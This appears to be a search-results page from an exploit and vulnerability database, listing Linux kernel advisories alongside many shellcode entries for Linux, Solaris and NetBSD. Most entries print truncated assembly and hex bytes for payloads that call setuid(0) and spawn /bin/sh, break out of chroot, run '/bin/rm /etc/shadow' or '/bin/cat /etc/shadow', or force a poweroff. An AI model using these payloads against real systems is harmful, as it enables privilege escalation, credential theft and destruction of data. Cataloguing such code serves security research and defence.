1131 matches found
Debian DSA-1872-1 : linux-2.6 - denial of service/privilege escalation/information leak
Several vulnerabilities have been discovered in the Linux kernel that may lead to denial of service, privilege escalation or a leak of sensitive memory. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2009-2698 Herbert Xu discovered an issue in the way U...
linux/x86 - /bin/sh 8 bytes
Exploit for linux/x86 platform in category shellcode =========================== linux/x86 - /bin/sh 8 bytes =========================== / 08048334 : 8048334: 99 cltd 8048335: 6a 0b push $0xb 8048337: 58 pop %eax 8048338: 60 pusha 8048339: 59 pop %ecx 804833a: cd 80 int $0x80 using this code...
Linux x86 - /bin/sh 8 bytes
Linux x86 - /bin/sh 8 bytes. Shellcode exploit for linx86 platform / 08048334 : 8048334: 99 cltd 8048335: 6a 0b push $0xb 8048337: 58 pop %eax 8048338: 60 pusha 8048339: 59 pop %ecx 804833a: cd 80 int $0x80 using this code. step1. This code is compiled. step2. strace -x output binary step3. get...
Linux Kernel 64位Personality处理本地拒绝服务漏洞
BUGTRAQ ID: 38027 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel在设置进程的personality时存在错误,本地用户在执行缺少ELF解释器的64位应用时可能触发分段错误,导致内核崩溃。 漏洞起因是fs/binfmtelf.c文件中的loadelfbinary函数,该函数在检查ELF解释器可用之前调用了 SETPERSONALITY,将之前的32位进程转换为了64位进程。如果execve成功,这不会导致问题,但在...
solaris/sparc executes command after setreuid
No description provided by source. / bunkersparcexec.c V1.0 - Sat Oct 21 17:45:27 CEST 2006 Solaris/sparc bytecode that executes command after setreuid 92 bytes + cmd setreuid0, 0 + execve"/bin/sh", "/bin/sh","-c","cmd", NULL; bunker - http://rawlab.mindcreations.com 37F1 A7A1 BB94 89DB A920 3105...
solaris/x86 setuid(0) execve(//bin/sh)
No description provided by source. / ; sm4x 2008 ; setuid0, execve'/bin/sh', '/bin/sh', 0, ; 39 bytes NizzULL free you know... ; SunOS sol01 5.11 snv86 i86pc i386 i86pc Solaris ; quick port to drop root sh - ; - SunOS is pwnij global start start: xor eax, eax ; --- setuid0 push eax push eax mov a...
netbsd/x86 setreuid(0 0)
No description provided by source. / minervini at neuralnoise dot com c 2005 NetBSD/i386 2.0, setreuid0, 0; execve"/bin//sh", ..., NULL; note: unsafe shellcode, but 29 bytes long; doesn't work if eax & 0x40000000 != 0; / include sys/types.h include stdio.h include string.h char scode = "\x99" //...
linux/x86 execve(""/bin/ash"" 0 0)
No description provided by source. / 21 byte execve"/bin/ash",0,0; shellcode for linux x86 by zasta zasta at darkircop.org / include unistd.h include stdio.h char shellcode = "\x31\xc9\xf7\xe1\x04\x0b\x52\x68" "\x2f\x61\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\xcd\x80"; void code asm" xor %ecx,%ecx...
Linux - setreuid (0,0) & execve(/bin/rm /etc/shadow)
No description provided by source. / rmtheshadow.c by mrme Just for fun : visit: http://www.corelan.be:8800/ / include stdio.h include string.h char sc = "x31xc0" // xor %eax,%eax "xb0x46" // mov $046,%al "x31xdb" // xor %ebx,%ebx "x31xc9" // xor %ecx,%ecx "xcdx80" // int $080 "x31xc0" // xor...
linux/x86 break chroot 87 bytes
Exploit for linux/x86 platform in category shellcode =============================== linux/x86 break chroot 87 bytes =============================== bt:/ ./pwn perl -e 'print "\x90"x181...
Linux - setreuid (0 0) & execve(/bin/rm /etc/shadow)
No description provided by source. / rmtheshadow.c by mrme Just for fun : visit: http://www.corelan.be:8800/ / include stdio.h include string.h char sc = "x31xc0" // xor %eax,%eax "xb0x46" // mov $046,%al "x31xdb" // xor %ebx,%ebx "x31xc9" // xor %ecx,%ecx "xcdx80" // int $080 "x31xc0" // xor...
linux/x86 setreuid (0,0) & execve(/bin/rm /etc/shadow)
Exploit for linux/x86 platform in category shellcode ====================================================== linux/x86 setreuid 0,0 & execve/bin/rm /etc/shadow ====================================================== / rmtheshadow.c / include include char sc = "x31xc0" // xor %eax,%eax "xb0x46" // m...
Linux - setuid(0) & execve("/sbin/poweroff -f")
No description provided by source. include stdio.h / linux/x86 ; setuid0 & execve"/sbin/poweroff -f" 47 bytes written by ka0x - ka0x01alt+64gmail.com lun sep 21 16:40:16 CEST 2009 greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek, Hendrix and others! / int main char shellco...
Linux - linux/x86 execve() - 51bytes
No description provided by source. / linux/x86 execve51bytes 08048080 start: 8048080: eb 1a jmp 804809c 08048082 : 8048082: 5e pop %esi 8048083: 31 c0 xor %eax,%eax 8048085: 88 46 07 mov %al,0x7%esi 8048088: 8d 1e lea %esi,%ebx 804808a: 89 5e 08 mov %ebx,0x8%esi 804808d: 89 46 0c mov %eax,0xc%esi...
Linux - linux/x86 execve - 51bytes
Linux - linux/x86 execve - 51bytes. Shellcode exploit for linx86 platform / linux/x86 execve51bytes 08048080 : 8048080: eb 1a jmp 804809c 08048082 : 8048082: 5e pop %esi 8048083: 31 c0 xor %eax,%eax 8048085: 88 46 07 mov %al,0x7%esi 8048088: 8d 1e lea %esi,%ebx 804808a: 89 5e 08 mov %ebx,0x8%esi...
linux/x86 execve() - 51bytes
Exploit for linux/x86 platform in category shellcode ============================ linux/x86 execve - 51bytes ============================ / linux/x86 execve51bytes 08048080 : 8048080: eb 1a jmp 804809c 08048082 : 8048082: 5e pop %esi 8048083: 31 c0 xor %eax,%eax 8048085: 88 46 07 mov %al,0x7%esi...
linux/x86 setuid(0) & execve("/sbin/poweroff -f") 47 bytes
Exploit for linux/x86 platform in category shellcode ========================================================== linux/x86 setuid0 & execve"/sbin/poweroff -f" 47 bytes ========================================================== include / linux/x86 ; setuid0 & execve"/sbin/poweroff -f" 47 bytes...
Linux - setuid0 & execve"/sbin/poweroff -f"
Linux - setuid0 & execve"/sbin/poweroff -f". Shellcode exploit for linx86 platform include / linux/x86 ; setuid0 & execve"/sbin/poweroff -f" 47 bytes written by ka0x - lun sep 21 16:40:16 CEST 2009 greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek, Hendrix and others! / int...
linux/x86 setuid(0) & execve(/bin/cat /etc/shadow) 49 bytes
Exploit for linux/x86 platform in category shellcode =========================================================== linux/x86 setuid0 & execve/bin/cat /etc/shadow 49 bytes =========================================================== include / linux/x86 ; setuid0 & execve/bin/cat /etc/shadow 49 bytes...
SuSE9 Security Update : Linux kernel (YOU Patch Number 12541)
This update fixes various security issues and some bugs in the SUSE Linux Enterprise 9 kernel. The following security bugs were fixed : - A race condition in the pipe2 systemcall could be used by local attackers to execute code. CVE-2009-3547 - On x8664 systems a information leak of high register...